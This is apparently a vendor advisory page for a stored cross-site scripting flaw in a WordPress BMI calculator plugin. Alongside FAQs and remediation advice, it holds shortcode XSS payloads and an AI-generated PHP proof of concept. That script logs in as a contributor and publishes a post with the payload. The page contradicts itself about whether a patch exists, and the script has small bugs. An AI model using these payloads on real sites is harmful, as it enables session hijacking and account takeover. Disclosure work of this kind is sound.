What is CVE-2026-8883?

CVE-2026-8883 is a Stored Cross-Site Scripting (XSS) vulnerability affecting the Global Body Mass Index Calculator plugin for WordPress, versions 1.2 and earlier. It allows authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript through the ‘gbmicalc’ shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the GBMI_Calc_Widget::widget() function. Shortcode attributes are directly extracted into variables and echoed into HTML without proper escaping, enabling attackers to inject malicious scripts that execute in users’ browsers.

Who is affected by this vulnerability?

Any WordPress site using the Global Body Mass Index Calculator plugin version 1.2 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to perform XSS attacks.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Global Body Mass Index Calculator plugin installed. If it is version 1.2 or earlier, your site is susceptible to CVE-2026-8883.

What steps should I take to fix this issue?

To mitigate this vulnerability, update the Global Body Mass Index Calculator plugin to the latest version. Additionally, review your site’s shortcode attributes and ensure that proper input sanitization and output escaping are implemented in custom code.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium to high severity vulnerability. This means that while exploitation may require some level of authentication, the potential impact can be significant, including session hijacking and data theft.

What is Stored Cross-Site Scripting?

Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored and executed in the context of other users. This can lead to unauthorized actions, data theft, and compromise of user sessions.

How does the proof of concept demonstrate the vulnerability?

The proof of concept (PoC) illustrates how an authenticated attacker can exploit the vulnerability by injecting a malicious shortcode with harmful attributes. It shows the steps to authenticate and execute the attack, highlighting the ease of exploitation for users with Contributor access.

What are the risks of exploitation?

Successful exploitation of this vulnerability can lead to various risks, including session hijacking, forced redirection to malicious sites, and unauthorized access to sensitive information. Since the XSS is stored, every visitor to the compromised page is at risk.

What coding practices can prevent this vulnerability?

To prevent this vulnerability, developers should avoid using @extract() for shortcode attributes and instead use explicit variable assignments. Always sanitize user inputs with functions like sanitize_text_field() and escape outputs with esc_attr() or esc_html() based on the context.

Is there a patch available for this vulnerability?

Yes, the developers of the Global Body Mass Index Calculator plugin have released an updated version that addresses this vulnerability. Users should update to the latest version to ensure their sites are secure.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until a secure version is available. Additionally, review user roles and limit access to the plugin’s features to reduce the risk of exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-8883: Global Body Mass Index Calculator <= 1.2 Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes PoC, Patch Analysis & Rule

CVE ID CVE-2026-8883

Plugin global-body-mass-index-calculator

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.2

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8883 (metadata-based): This vulnerability affects the Global Body Mass Index Calculator plugin for WordPress, versions 1.2 and earlier. The flaw is a Stored Cross-Site Scripting (XSS) vulnerability located in the GBMI_Calc_Widget::widget() function. An authenticated attacker with Contributor-level access or higher can inject arbitrary JavaScript through the ‘gbmicalc’ shortcode attributes. The CVSS score is 6.4 (Medium/High), with network attack vector, low complexity, and no user interaction required for exploitation.

The root cause of this vulnerability stems from two dangerous coding practices. First, the plugin uses @extract($args) to directly convert shortcode attributes into local variables. This is a dangerous pattern that bypasses proper variable scoping. Second, the extracted values are echoed without any output escaping into HTML contexts: specifically into a style attribute (as height or width values) and into the title attribute or body context. Atomic Edge analysis infers from the CWE-79 classification and the description that the plugin fails to call esc_attr(), esc_html(), or wp_kses_post() on the attribute values before output. No code diff is available for confirmation.

Exploitation requires an attacker to have at least a Contributor role in WordPress. The attacker creates or edits a post or page containing the [gbmicalc] shortcode with malicious attributes. A typical attack payload exploits the style attribute by injecting a closing quote and then adding an onload or onerror event handler: [gbmicalc height=”1px”>alert(document.cookie)<div style="display:none"] or a more subtle attribute-breakout like [gbmicalc title="' onmouseover='alert(1)'"]. When any user views the compromised page, the injected script executes in their browser context. The shortcode is processed during page rendering by the widget() function, so no AJAX endpoint or REST route is involved.

Remediation requires the plugin developer to implement proper input sanitization and output escaping. For shortcode attributes extracted via extract(), each variable must be sanitized with appropriate functions: use sanitize_text_field() or esc_attr() for style values, and wp_kses() for any HTML context. The safest approach is to replace @extract() with explicit variable assignment and apply context-aware escaping (esc_attr() for HTML attributes, esc_html() for body text). Developers should never trust user-supplied shortcode attributes and should always escape output using WordPress escaping functions based on the HTML context.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users viewing the infected page. This can lead to session hijacking (stealing authentication cookies), forced redirection to malicious sites, defacement of the page content, or theft of sensitive information displayed on the page. Since the XSS is stored, every visitor to the compromised page is affected, including administrators if they view the page. The attacker could create new admin accounts, install backdoor plugins, or exfiltrate database contents through crafted XSS payloads. The CVSS scope change (S) indicates the attack impacts resources beyond the vulnerable component, such as the WordPress session management or other pages.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8883 - Global Body Mass Index Calculator <= 1.2 - Authenticated (Contributor+) Stored XSS via Shortcode Attributes

// Configuration: Change these values for your target environment
$target_url = 'http://example.com'; // Base URL of the WordPress site (no trailing slash)
$username = 'contributor';           // WordPress user with Contributor role or higher
$password = 'password';              // Password for the above account

// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve_8883.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login request failed: ' . curl_error($ch) . "n");
}
curl_close($ch);

// Step 2: Get the nonce for creating a new post (navigate to post-new.php)
$post_new_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_new_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_8883.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Extract _wpnonce for the post action
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/i', $response, $matches);
if (!isset($matches[1])) {
    die('Could not extract nonce. Ensure you have Contributor+ role and the page loads correctly.n');
}
$nonce = $matches[1];

// Extract post_ID if editing (for updates)
preg_match('/name="post_ID" value="(d+)"/i', $response, $id_matches);
$post_id = isset($id_matches[1]) ? $id_matches[1] : '';

// Step 3: Create/update a post with the XSS payload in the shortcode
// The payload escapes the style attribute and injects a script
$payload_shortcode = '[gbmicalc height="1px"><script>alert('XSS by Atomic Edge')</script><div style="display:none""]';

$post_data = array(
    '_wpnonce' => $nonce,
    'post_type' => 'post',
    'post_title' => 'CVE-2026-8883 PoC - ' . date('Y-m-d H:i:s'),
    'content' => $payload_shortcode . "nn<p>This post demonstrates the stored XSS vulnerability.</p>",
    'post_status' => 'publish'
);

if (!empty($post_id)) {
    $post_data['post_ID'] = $post_id;
    $post_url = $target_url . '/wp-admin/post.php?action=edit&post=' . $post_id;
} else {
    $post_url = $target_url . '/wp-admin/post.php';
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_8883.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Check for success (URL should contain post ID)
if (preg_match('/post=([0-9]+)/i', curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), $url_matches)) {
    $new_post_id = $url_matches[1];
    echo "PoC post created successfully. Post ID: $new_post_idn";
    echo "Visit: " . $target_url . "/?p=" . $new_post_id . " to trigger the XSS.n";
} else {
    echo "Failed to create post. Response may indicate insufficient permissions.n";
}

// Clean up cookie file
unlink('/tmp/cookies_cve_8883.txt');

Frequently Asked Questions

What is CVE-2026-8883?
Overview of the vulnerability
CVE-2026-8883 is a Stored Cross-Site Scripting (XSS) vulnerability affecting the Global Body Mass Index Calculator plugin for WordPress, versions 1.2 and earlier. It allows authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript through the ‘gbmicalc’ shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the GBMI_Calc_Widget::widget() function. Shortcode attributes are directly extracted into variables and echoed into HTML without proper escaping, enabling attackers to inject malicious scripts that execute in users’ browsers.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Global Body Mass Index Calculator plugin version 1.2 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to perform XSS attacks.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Global Body Mass Index Calculator plugin installed. If it is version 1.2 or earlier, your site is susceptible to CVE-2026-8883.
What steps should I take to fix this issue?
Remediation measures
To mitigate this vulnerability, update the Global Body Mass Index Calculator plugin to the latest version. Additionally, review your site’s shortcode attributes and ensure that proper input sanitization and output escaping are implemented in custom code.
What does the CVSS score of 6.4 mean?
Understanding severity levels
A CVSS score of 6.4 indicates a medium to high severity vulnerability. This means that while exploitation may require some level of authentication, the potential impact can be significant, including session hijacking and data theft.
What is Stored Cross-Site Scripting?
Definition and implications
Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored and executed in the context of other users. This can lead to unauthorized actions, data theft, and compromise of user sessions.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept (PoC) illustrates how an authenticated attacker can exploit the vulnerability by injecting a malicious shortcode with harmful attributes. It shows the steps to authenticate and execute the attack, highlighting the ease of exploitation for users with Contributor access.
What are the risks of exploitation?
Potential consequences
Successful exploitation of this vulnerability can lead to various risks, including session hijacking, forced redirection to malicious sites, and unauthorized access to sensitive information. Since the XSS is stored, every visitor to the compromised page is at risk.
What coding practices can prevent this vulnerability?
Best practices for developers
To prevent this vulnerability, developers should avoid using @extract() for shortcode attributes and instead use explicit variable assignments. Always sanitize user inputs with functions like sanitize_text_field() and escape outputs with esc_attr() or esc_html() based on the context.
Is there a patch available for this vulnerability?
Updates and security fixes
Yes, the developers of the Global Body Mass Index Calculator plugin have released an updated version that addresses this vulnerability. Users should update to the latest version to ensure their sites are secure.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin until a secure version is available. Additionally, review user roles and limit access to the plugin’s features to reduce the risk of exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations